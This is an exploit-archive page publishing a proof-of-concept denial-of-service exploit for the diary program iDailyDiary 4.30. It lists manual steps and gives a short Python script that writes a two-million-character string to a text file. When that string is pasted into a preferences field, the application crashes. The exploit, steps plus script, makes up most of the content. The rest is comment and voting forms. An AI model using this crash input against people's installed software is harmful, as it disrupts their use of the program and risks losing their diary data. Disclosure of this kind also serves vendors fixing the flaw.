iDailyDiary 4.30 Denial Of Service

2021.05.26

Credit: Ismael Nava

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: iDailyDiary 4.30 - Denial of Service (PoC)
# Date: 2021-05-21
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.splinterware.com/index.html
# Software Link: https://www.splinterware.com/download/iddfree.exe
# Version: 4.30
# Tested on: Windows 10 Home x64

#STEPS
# Open the program iDailyDiary
# Create a New Diary, put any name and check the option "Do not prompt for password", click in OK
# In the tab "View", click in "Preferences"
# Click in the option "Tabs"
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Sotsu.txt"
# Paste the content in the field below "Default diary tab name when creating new tabs" 
# Click in Apply
# End :)


buffer = 'F' * 2000000

try: 
    file = open("Sotsu.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

iDailyDiary 4.30 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.